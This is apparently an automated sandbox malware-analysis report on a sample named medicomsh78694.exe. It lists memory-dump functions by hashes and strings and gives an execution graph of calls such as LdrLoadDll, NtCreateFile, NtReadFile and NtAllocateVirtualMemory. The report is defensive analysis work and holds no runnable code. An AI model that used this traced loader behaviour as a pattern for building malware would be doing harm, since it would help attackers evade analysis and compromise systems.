                                                                            • Instruction ID: 55c26ee05999bf635d58123237908d89a8f758acfff67d60c2ae1c21ba173f4f
                                                                            • Opcode Fuzzy Hash: ef5e6911f7bef99bf46c77abb7ee7fb21293098d625902089782cc599d4d6d7f
                                                                            • Instruction Fuzzy Hash: A5513871E4562A8BDB64CF66CD407D9F7B2BBC9300F1482BAD50DA7210EB749AC19F44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0044B588, Relevance: 1.7, Strings: 1, Instructions: 406COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 'yL
                                                                            • API String ID: 0-4200078285
                                                                            • Opcode ID: 5263ea5695ee6becffd01df2863e9c48db7b331e375892013108125ce8772781
                                                                            • Instruction ID: a4d65c2c9810b77e28cffc65abf53951c39c8c1497bfc2ac01eb8a03a9a2355f
                                                                            • Opcode Fuzzy Hash: 5263ea5695ee6becffd01df2863e9c48db7b331e375892013108125ce8772781
                                                                            • Instruction Fuzzy Hash: 09024974E102598FDB14DFA9C580AAEFBB2FF89304F24816AD409AB355C7349A41CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004457FA, Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ldr
                                                                            • API String ID: 0-390282691
                                                                            • Opcode ID: db937961f64fab3316056a17d2e14ade41284c27a8cd6e0f3a25de6ecdfe4807
                                                                            • Instruction ID: 440ea0b32cc0969b0de0c38741c38714b33e1b023e853813ef5bf85965eb31de
                                                                            • Opcode Fuzzy Hash: db937961f64fab3316056a17d2e14ade41284c27a8cd6e0f3a25de6ecdfe4807
                                                                            • Instruction Fuzzy Hash: 3D5138B0D0460A9FDB04CFA6C4815AEBBF2EF89340F24C46AC415E7255D6389A42CF59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00445808, Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ldr
                                                                            • API String ID: 0-390282691
                                                                            • Opcode ID: 8fdd8cdaebe2f292f358b24d2b73ab5bcb85ccc02ce77aa07d252017275edb8d
                                                                            • Instruction ID: 7b3a5ac4e26ab5e95733010fb6176cafef84e1471f89e82169dd207cce2c2b4d
                                                                            • Opcode Fuzzy Hash: 8fdd8cdaebe2f292f358b24d2b73ab5bcb85ccc02ce77aa07d252017275edb8d
                                                                            • Instruction Fuzzy Hash: D751F9B0D0460ADBDB44CFA6C5815AEFBF2FF88340F24D42AC519E7255D7389A428F99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004445B0, Relevance: .2, Instructions: 178COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 086e8414f279ef533615968715529625902fb94d4d56b3e80a44eca19cdb757c
                                                                            • Instruction ID: d27da40965ec482f30e330de572e9e923b7d0e8fa676fb19f11dc42d97c77d75
                                                                            • Opcode Fuzzy Hash: 086e8414f279ef533615968715529625902fb94d4d56b3e80a44eca19cdb757c
                                                                            • Instruction Fuzzy Hash: 4081C074E102199FCB04CFA9C585A9EFBF2FF89310F24855AE519AB320D334AA42CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004445A0, Relevance: .2, Instructions: 176COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5ed3039f74036d7111d2037b6634e86b2713336add9a7aa5f090df4b9b19c554
                                                                            • Instruction ID: d8212b677e5a40fbd969888a95c57782cdd2cfae45c4ee84b75c869df2def342
                                                                            • Opcode Fuzzy Hash: 5ed3039f74036d7111d2037b6634e86b2713336add9a7aa5f090df4b9b19c554
                                                                            • Instruction Fuzzy Hash: E371E174A142599FCB04CFA9C584A9EFBF2FF89310F24856AD419AB321D334AA42CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004468C8, Relevance: .2, Instructions: 169COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1486be31067193f65b5019a8e71bffbbdec3e05b7481410c93416034ff4cc703
                                                                            • Instruction ID: e59442b34da8cf89534aa5e73a6b768b0f3b69f82d0815f467e7055f995ded9e
                                                                            • Opcode Fuzzy Hash: 1486be31067193f65b5019a8e71bffbbdec3e05b7481410c93416034ff4cc703
                                                                            • Instruction Fuzzy Hash: 0D614F71D197988FDB29CF678D452CABBB3AFC6200F14C1FAC84996166EB3409468F06
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00445A60, Relevance: .1, Instructions: 149COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4e0f1a2f4f6daa3b53d1a7ec725c258b67f646114ea9bd3c8abf101a21614a46
                                                                            • Instruction ID: f0629826a403adeafd981883aa4a7f9c2565b6ff8164ae9d8858fee660b58dcc
                                                                            • Opcode Fuzzy Hash: 4e0f1a2f4f6daa3b53d1a7ec725c258b67f646114ea9bd3c8abf101a21614a46
                                                                            • Instruction Fuzzy Hash: AF51D274E046199FDF04CFAAC5809DEFBF2EB89300F24952AD415B7325D7349A428F59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00445C78, Relevance: .1, Instructions: 102COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 450c2adac9fed24b98ea9a12d94b6135e26335836bfcf4c4edb0968d607bbd70
                                                                            • Instruction ID: b75290d79f62aa5d747fce5cf014fca784b67164b1d407a0806722d1081fdc51
                                                                            • Opcode Fuzzy Hash: 450c2adac9fed24b98ea9a12d94b6135e26335836bfcf4c4edb0968d607bbd70
                                                                            • Instruction Fuzzy Hash: 0A41F4B0E0560A9FDF04CFAAC5815AEFBF2BF88300F24C56AC505A7255D7349A41CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00445C88, Relevance: .1, Instructions: 102COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 941503acf948f425731026ac8946859b242e33cbe76fc4661449005b4b33ca66
                                                                            • Instruction ID: 233433908c6e27cf07b77e323e08585d8212a4e1f55f6991d07aad2aba7eb90f
                                                                            • Opcode Fuzzy Hash: 941503acf948f425731026ac8946859b242e33cbe76fc4661449005b4b33ca66
                                                                            • Instruction Fuzzy Hash: EA41E5B0E04609DBDF04CFAAC5815AEFBF2BF88300F24C56AC505B7255D7345A419F95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00443668, Relevance: .1, Instructions: 91COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c2c8139724234dd537ce5439f150a76b3261d4105201e7fcd4578c1a4e60cd12
                                                                            • Instruction ID: 647d570da6afe3fc19312cef9e27371fa6ddb97c3b3d812d82ca924e6d4688c6
                                                                            • Opcode Fuzzy Hash: c2c8139724234dd537ce5439f150a76b3261d4105201e7fcd4578c1a4e60cd12
                                                                            • Instruction Fuzzy Hash: ED311970E0420ADBDB08CF96D5854AEFBB6EF88701F25C52AC505A7364D7349A428F95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00449820, Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0e8fd8709ea9cf254de76471bc76cb213616a63e055dae04b53c0a14775583a5
                                                                            • Instruction ID: ff53b2843875ae50a83af8fd199645443ff9fa993373b7ed0c1c596cc014a72d
                                                                            • Opcode Fuzzy Hash: 0e8fd8709ea9cf254de76471bc76cb213616a63e055dae04b53c0a14775583a5
                                                                            • Instruction Fuzzy Hash: 00213370E112189BDB48CFAAD940A9EFBF7EFC9300F14C03AE408A7254DB345A42DB95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004404E7, Relevance: .1, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8cc03186f906eabac22f7d213d5c3ad70075af3bf388e303dfe080ae1cd6f37d
                                                                            • Instruction ID: 9603e1cd4215542aca5c45d41f86c4b81649ccf914f83cf27cd247c039b95e33
                                                                            • Opcode Fuzzy Hash: 8cc03186f906eabac22f7d213d5c3ad70075af3bf388e303dfe080ae1cd6f37d
                                                                            • Instruction Fuzzy Hash: D921EA71E086489BEB18CF6B8C406DEFBF3AFC9200F18C1BAC548A6265DB7405568F11
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0044F2A8, Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dca0d0392701ad148758f54b724fd4bfefc8676d5a346f9209388955ed1a732b
                                                                            • Instruction ID: aa64bbd732aaaa4bea6dabcbf8d2749acbe14e8b59fa02a098350f1a9ec0c4e3
                                                                            • Opcode Fuzzy Hash: dca0d0392701ad148758f54b724fd4bfefc8676d5a346f9209388955ed1a732b
                                                                            • Instruction Fuzzy Hash: F0113030D042598FEB14CFA5C848BEEBBF1AB4D301F24507AD441B3390CB785988DB69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0037F78A, Relevance: 7.8, Strings: 6, Instructions: 302COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 8A$\-2l$\-2l$\-2l$\-2l$\-2l
                                                                            • API String ID: 0-2549659905
                                                                            • Opcode ID: ae4a8778a4b22710dc7e02e28bd72fe07561855bb2adcb41a9d01744aab98a63
                                                                            • Instruction ID: 14f52be3bf080f7880cded58a8a3d6e72109a1aa3d5f65515ff504c304dc949c
                                                                            • Opcode Fuzzy Hash: ae4a8778a4b22710dc7e02e28bd72fe07561855bb2adcb41a9d01744aab98a63
                                                                            • Instruction Fuzzy Hash: E0B1F230A08245DFCB268FA8D851BEDBBF6BF45304F248476E519AB691C7388C41DB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Analysis Process: medicomsh78694.exe PID: 2008 Parent PID: 2824 medicomsh78694.exeCOMMON

                                                                            Execution Graph

                                                                            Execution Coverage:3.6%
                                                                            Dynamic/Decrypted Code Coverage:3.6%
                                                                            Signature Coverage:6.2%
                                                                            Total number of Nodes:612
                                                                            Total number of Limit Nodes:76

                                                                            Graph

                                                                            execution_graph 41089 41d450 41090 41d45b 41089->41090 41092 419c00 41089->41092 41093 419c26 41092->41093 41104 408b70 41093->41104 41095 419c32 41103 419c79 41095->41103 41112 40d180 41095->41112 41097 419c47 41100 419c5c 41097->41100 41160 418940 41097->41160 41124 40a620 41100->41124 41101 419c6b 41102 418940 2 API calls 41101->41102 41102->41103 41103->41090 41105 408b7d 41104->41105 41163 408ac0 41104->41163 41107 408b84 41105->41107 41175 408a60 41105->41175 41107->41095 41113 40d1ac 41112->41113 41595 40a020 41113->41595 41115 40d1be 41599 40d090 41115->41599 41118 40d1f1 41122 418720 2 API calls 41118->41122 41123 40d202 41118->41123 41119 40d1d9 41120 40d1e4 41119->41120 41121 418720 2 API calls 41119->41121 41120->41097 41121->41120 41122->41123 41123->41097 41125 40a645 41124->41125 41126 40a020 LdrLoadDll 41125->41126 41127 40a69c 41126->41127 41618 409ca0 41127->41618 41129 40a913 41129->41101 41130 40a6c2 41130->41129 41627 4133b0 41130->41627 41132 40a707 41132->41129 41630 4079e0 41132->41630 41134 40a74b 41134->41129 41637 418790 41134->41637 41138 40a7a1 41139 40a7a8 41138->41139 41649 4182a0 41138->41649 41140 41a0b0 2 API calls 41139->41140 41142 40a7b5 41140->41142 41142->41101 41144 40a7f2 41145 41a0b0 2 API calls 41144->41145 41146 40a7f9 41145->41146 41146->41101 41147 40a802 41148 40d210 3 API calls 41147->41148 41149 40a876 41148->41149 41149->41139 41150 40a881 41149->41150 41151 41a0b0 2 API calls 41150->41151 41152 40a8a5 41151->41152 41654 4182f0 41152->41654 41155 4182a0 2 API calls 41156 40a8e0 41155->41156 41156->41129 41659 4180b0 41156->41659 41159 418940 2 API calls 41159->41129 41161 4191f0 LdrLoadDll 41160->41161 41162 41895f ExitProcess 41161->41162 41162->41100 41194 416e60 41163->41194 41167 408ae6 41167->41105 41168 408adc 41168->41167 41201 419540 41168->41201 41170 408b23 41170->41167 41212 4088e0 41170->41212 41172 408b43 41218 408330 LdrLoadDll 41172->41218 41174 408b55 41174->41105 41176 408a7a 41175->41176 41177 419830 LdrLoadDll 41175->41177 41569 419830 41176->41569 41177->41176 41180 419830 LdrLoadDll 41181 408aa1 41180->41181 41182 40cf80 41181->41182 41183 40cf99 41182->41183 41577 409ea0 41183->41577 41185 40cfac 41581 418470 41185->41581 41189 40cfd2 41190 40cffd 41189->41190 41588 4184f0 41189->41588 41192 418720 2 API calls 41190->41192 41193 408b95 41192->41193 41193->41095 41195 416e6f 41194->41195 41219 413e60 41195->41219 41197 408ad3 41198 416d10 41197->41198 41225 418890 41198->41225 41202 419559 41201->41202 41232 413a60 41202->41232 41204 419571 41205 41957a 41204->41205 41271 419380 41204->41271 41205->41170 41207 41958e 41207->41205 41289 418190 41207->41289 41215 4088fa 41212->41215 41547 406e30 41212->41547 41214 408901 41214->41172 41215->41214 41560 4070f0 41215->41560 41218->41174 41220 413e7a 41219->41220 41223 413e6e 41219->41223 41220->41197 41222 413fcc 41222->41197 41223->41220 41224 4142e0 LdrLoadDll 41223->41224 41224->41222 41228 4191f0 41225->41228 41227 416d25 41227->41168 41229 419200 41228->41229 41231 419222 41228->41231 41230 413e60 LdrLoadDll 41229->41230 41230->41231 41231->41227 41233 413d95 41232->41233 41243 413a74 41232->41243 41233->41204 41236 413ba0 41300 4185f0 41236->41300 41237 413b83 41358 4186f0 LdrLoadDll 41237->41358 41240 413bc7 41242 41a0b0 2 API calls 41240->41242 41241 413b8d 41241->41204 41245 413bd3 41242->41245 41243->41233 41297 417ee0 41243->41297 41244 413d59 41247 418720 2 API calls 41244->41247 41245->41241 41245->41244 41246 413d6f 41245->41246 41251 413c62 41245->41251 41368 4137a0 LdrLoadDll NtReadFile NtClose 41246->41368 41248 413d60 41247->41248 41248->41204 41250 413d82 41250->41204 41252 413cc9 41251->41252 41254 413c71 41251->41254 41252->41244 41253 413cdc 41252->41253 41360 418570 41253->41360 41256 413c76 41254->41256 41257 413c8a 41254->41257 41359 413660 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 41256->41359 41260 413ca7 41257->41260 41261 413c8f 41257->41261 41260->41248 41316 413420 41260->41316 41304 413700 41261->41304 41263 413c80 41263->41204 41265 413d3c 41365 418720 41265->41365 41266 413c9d 41266->41204 41268 413cbf 41268->41204 41270 413d48 41270->41204 41272 419391 41271->41272 41273 4193a3 41272->41273 41386 41a030 41272->41386 41273->41207 41275 4193c4 41389 413070 41275->41389 41277 419410 41277->41207 41278 4193e7 41278->41277 41279 413070 3 API calls 41278->41279 41281 419409 41279->41281 41281->41277 41421 4143a0 41281->41421 41282 41949a 41283 4194aa 41282->41283 41515 419190 LdrLoadDll 41282->41515 41431 419000 41283->41431 41286 4194d8 41510 418150 41286->41510 41290 4181ac 41289->41290 41291 4191f0 LdrLoadDll 41289->41291 41543 bafae8 LdrInitializeThunk 41290->41543 41291->41290 41292 4181c7 41294 41a0b0 41292->41294 41295 4195e9 41294->41295 41544 418900 41294->41544 41295->41170 41298 413b54 41297->41298 41299 4191f0 LdrLoadDll 41297->41299 41298->41236 41298->41237 41298->41241 41299->41298 41301 41860c NtCreateFile 41300->41301 41302 4191f0 LdrLoadDll 41300->41302 41301->41240 41302->41301 41305 41371c 41304->41305 41306 418570 LdrLoadDll 41305->41306 41307 41373d 41306->41307 41308 413744 41307->41308 41309 413758 41307->41309 41311 418720 2 API calls 41308->41311 41310 418720 2 API calls 41309->41310 41312 413761 41310->41312 41313 41374d 41311->41313 41369 41a2c0 LdrLoadDll RtlAllocateHeap 41312->41369 41313->41266 41315 41376c 41315->41266 41317 41346b 41316->41317 41318 41349e 41316->41318 41320 418570 LdrLoadDll 41317->41320 41319 4135e9 41318->41319 41323 4134ba 41318->41323 41322 418570 LdrLoadDll 41319->41322 41321 413486 41320->41321 41324 418720 2 API calls 41321->41324 41328 413604 41322->41328 41325 418570 LdrLoadDll 41323->41325 41326 41348f 41324->41326 41327 4134d5 41325->41327 41326->41268 41330 4134f1 41327->41330 41331 4134dc 41327->41331 41382 4185b0 LdrLoadDll 41328->41382 41334 4134f6 41330->41334 41338 41350c 41330->41338 41333 418720 2 API calls 41331->41333 41332 41363e 41335 418720 2 API calls 41332->41335 41336 4134e5 41333->41336 41337 418720 2 API calls 41334->41337 41339 413649 41335->41339 41336->41268 41340 4134ff 41337->41340 41341 413511 41338->41341 41370 41a280 41338->41370 41339->41268 41340->41268 41345 413523 41341->41345 41373 4186a0 41341->41373 41344 413577 41346 41358e 41344->41346 41381 418530 LdrLoadDll 41344->41381 41345->41268 41347 413595 41346->41347 41348 4135aa 41346->41348 41350 418720 2 API calls 41347->41350 41351 418720 2 API calls 41348->41351 41350->41345 41352 4135b3 41351->41352 41353 4135df 41352->41353 41376 419e80 41352->41376 41353->41268 41355 4135ca 41356 41a0b0 2 API calls 41355->41356 41357 4135d3 41356->41357 41357->41268 41358->41241 41359->41263 41361 418576 41360->41361 41362 4191f0 LdrLoadDll 41361->41362 41363 413d24 41362->41363 41364 4185b0 LdrLoadDll 41363->41364 41364->41265 41366 41873c NtClose 41365->41366 41367 4191f0 LdrLoadDll 41365->41367 41366->41270 41367->41366 41368->41250 41369->41315 41383 4188c0 41370->41383 41372 41a298 41372->41341 41374 4186bc NtReadFile 41373->41374 41375 4191f0 LdrLoadDll 41373->41375 41374->41344 41375->41374 41377 419ea4 41376->41377 41378 419e8d 41376->41378 41377->41355 41378->41377 41379 41a280 2 API calls 41378->41379 41380 419ebb 41379->41380 41380->41355 41381->41346 41382->41332 41384 4191f0 LdrLoadDll 41383->41384 41385 4188dc RtlAllocateHeap 41384->41385 41385->41372 41387 41a05d 41386->41387 41516 4187d0 41386->41516 41387->41275 41390 413081 41389->41390 41391 413089 41389->41391 41390->41278 41420 41335c 41391->41420 41519 41b260 41391->41519 41393 4130dd 41394 41b260 2 API calls 41393->41394 41397 4130e8 41394->41397 41395 413136 41398 41b260 2 API calls 41395->41398 41397->41395 41399 41b390 3 API calls 41397->41399 41530 41b300 LdrLoadDll RtlAllocateHeap RtlFreeHeap 41397->41530 41401 41314a 41398->41401 41399->41397 41400 4131a7 41402 41b260 2 API calls 41400->41402 41401->41400 41524 41b390 41401->41524 41404 4131bd 41402->41404 41405 4131fa 41404->41405 41408 41b390 3 API calls 41404->41408 41406 41b260 2 API calls 41405->41406 41407 413205 41406->41407 41409 41323f 41407->41409 41410 41b390 3 API calls 41407->41410 41408->41404 41531 41b2c0 LdrLoadDll RtlFreeHeap 41409->41531 41410->41407 41412 413334 41532 41b2c0 LdrLoadDll RtlFreeHeap 41412->41532 41414 41333e 41533 41b2c0 LdrLoadDll RtlFreeHeap 41414->41533 41416 413348 41534 41b2c0 LdrLoadDll RtlFreeHeap 41416->41534 41418 413352 41535 41b2c0 LdrLoadDll RtlFreeHeap 41418->41535 41420->41278 41422 4143b1 41421->41422 41423 413a60 8 API calls 41422->41423 41425 4143c7 41423->41425 41424 41441a 41424->41282 41425->41424 41426 414402 41425->41426 41427 414415 41425->41427 41428 41a0b0 2 API calls 41426->41428 41429 41a0b0 2 API calls 41427->41429 41430 414407 41428->41430 41429->41424 41430->41282 41536 418ec0 41431->41536 41434 418ec0 LdrLoadDll 41435 41901d 41434->41435 41436 418ec0 LdrLoadDll 41435->41436 41437 419026 41436->41437 41438 418ec0 LdrLoadDll 41437->41438 41439 41902f 41438->41439 41440 418ec0 LdrLoadDll 41439->41440 41441 419038 41440->41441 41442 418ec0 LdrLoadDll 41441->41442 41443 419041 41442->41443 41444 418ec0 LdrLoadDll 41443->41444 41445 41904d 41444->41445 41446 418ec0 LdrLoadDll 41445->41446 41447 419056 41446->41447 41448 418ec0 LdrLoadDll 41447->41448 41449 41905f 41448->41449 41450 418ec0 LdrLoadDll 41449->41450 41451 419068 41450->41451 41452 418ec0 LdrLoadDll 41451->41452 41453 419071 41452->41453 41454 418ec0 LdrLoadDll 41453->41454 41455 41907a 41454->41455 41456 418ec0 LdrLoadDll 41455->41456 41457 419086 41456->41457 41458 418ec0 LdrLoadDll 41457->41458 41459 41908f 41458->41459 41460 418ec0 LdrLoadDll 41459->41460 41461 419098 41460->41461 41462 418ec0 LdrLoadDll 41461->41462 41463 4190a1 41462->41463 41464 418ec0 LdrLoadDll 41463->41464 41465 4190aa 41464->41465 41466 418ec0 LdrLoadDll 41465->41466 41467 4190b3 41466->41467 41468 418ec0 LdrLoadDll 41467->41468 41469 4190bf 41468->41469 41470 418ec0 LdrLoadDll 41469->41470 41471 4190c8 41470->41471 41472 418ec0 LdrLoadDll 41471->41472 41473 4190d1 41472->41473 41474 418ec0 LdrLoadDll 41473->41474 41475 4190da 41474->41475 41476 418ec0 LdrLoadDll 41475->41476 41477 4190e3 41476->41477 41478 418ec0 LdrLoadDll 41477->41478 41479 4190ec 41478->41479 41480 418ec0 LdrLoadDll 41479->41480 41481 4190f8 41480->41481 41482 418ec0 LdrLoadDll 41481->41482 41483 419101 41482->41483 41484 418ec0 LdrLoadDll 41483->41484 41485 41910a 41484->41485 41486 418ec0 LdrLoadDll 41485->41486 41487 419113 41486->41487 41488 418ec0 LdrLoadDll 41487->41488 41489 41911c 41488->41489 41490 418ec0 LdrLoadDll 41489->41490 41491 419125 41490->41491 41492 418ec0 LdrLoadDll 41491->41492 41493 419131 41492->41493 41494 418ec0 LdrLoadDll 41493->41494 41495 41913a 41494->41495 41496 418ec0 LdrLoadDll 41495->41496 41497 419143 41496->41497 41498 418ec0 LdrLoadDll 41497->41498 41499 41914c 41498->41499 41500 418ec0 LdrLoadDll 41499->41500 41501 419155 41500->41501 41502 418ec0 LdrLoadDll 41501->41502 41503 41915e 41502->41503 41504 418ec0 LdrLoadDll 41503->41504 41505 41916a 41504->41505 41506 418ec0 LdrLoadDll 41505->41506 41507 419173 41506->41507 41508 418ec0 LdrLoadDll 41507->41508 41509 41917c 41508->41509 41509->41286 41511 4191f0 LdrLoadDll 41510->41511 41512 41816c 41511->41512 41542 bafdc0 LdrInitializeThunk 41512->41542 41513 418183 41513->41207 41515->41283 41517 4187ec NtAllocateVirtualMemory 41516->41517 41518 4191f0 LdrLoadDll 41516->41518 41517->41387 41518->41517 41520 41b270 41519->41520 41521 41b276 41519->41521 41520->41393 41522 41a280 2 API calls 41521->41522 41523 41b29c 41522->41523 41523->41393 41525 41b300 41524->41525 41526 41a280 2 API calls 41525->41526 41527 41b35d 41525->41527 41528 41b33a 41526->41528 41527->41401 41529 41a0b0 2 API calls 41528->41529 41529->41527 41530->41397 41531->41412 41532->41414 41533->41416 41534->41418 41535->41420 41537 418edb 41536->41537 41538 413e60 LdrLoadDll 41537->41538 41539 418efb 41538->41539 41540 413e60 LdrLoadDll 41539->41540 41541 418fa7 41539->41541 41540->41541 41541->41434 41542->41513 41543->41292 41545 41891c RtlFreeHeap 41544->41545 41546 4191f0 LdrLoadDll 41544->41546 41545->41295 41546->41545 41548 406e40 41547->41548 41549 406e3b 41547->41549 41550 41a030 2 API calls 41548->41550 41549->41215 41557 406e65 41550->41557 41551 406ec8 41551->41215 41552 418150 2 API calls 41552->41557 41553 406ece 41555 406ef4 41553->41555 41556 418850 2 API calls 41553->41556 41555->41215 41558 406ee5 41556->41558 41557->41551 41557->41552 41557->41553 41559 41a030 2 API calls 41557->41559 41563 418850 41557->41563 41558->41215 41559->41557 41561 40710e 41560->41561 41562 418850 2 API calls 41560->41562 41561->41172 41562->41561 41564 4191f0 LdrLoadDll 41563->41564 41565 41886c 41564->41565 41568 bafb68 LdrInitializeThunk 41565->41568 41566 418883 41566->41557 41568->41566 41570 419853 41569->41570 41573 409b50 41570->41573 41574 409b74 41573->41574 41575 409bb0 LdrLoadDll 41574->41575 41576 408a8b 41574->41576 41575->41576 41576->41180 41578 409ec3 41577->41578 41580 409f40 41578->41580 41593 417f20 LdrLoadDll 41578->41593 41580->41185 41582 4191f0 LdrLoadDll 41581->41582 41583 40cfbb 41582->41583 41583->41193 41584 418a60 41583->41584 41585 418a66 41584->41585 41586 4191f0 LdrLoadDll 41585->41586 41587 418a7f LookupPrivilegeValueW 41586->41587 41587->41189 41589 4191f0 LdrLoadDll 41588->41589 41590 41850c 41589->41590 41594 bafed0 LdrInitializeThunk 41590->41594 41591 41852b 41591->41190 41593->41580 41594->41591 41596 40a047 41595->41596 41597 409ea0 LdrLoadDll 41596->41597 41598 40a076 41597->41598 41598->41115 41600 40d0aa 41599->41600 41608 40d160 41599->41608 41601 409ea0 LdrLoadDll 41600->41601 41602 40d0cc 41601->41602 41609 4181d0 41602->41609 41604 40d10e 41612 418210 41604->41612 41607 418720 2 API calls 41607->41608 41608->41118 41608->41119 41610 4191f0 LdrLoadDll 41609->41610 41611 4181ec 41610->41611 41611->41604 41613 41822c 41612->41613 41614 4191f0 LdrLoadDll 41612->41614 41617 bb07ac LdrInitializeThunk 41613->41617 41614->41613 41615 40d154 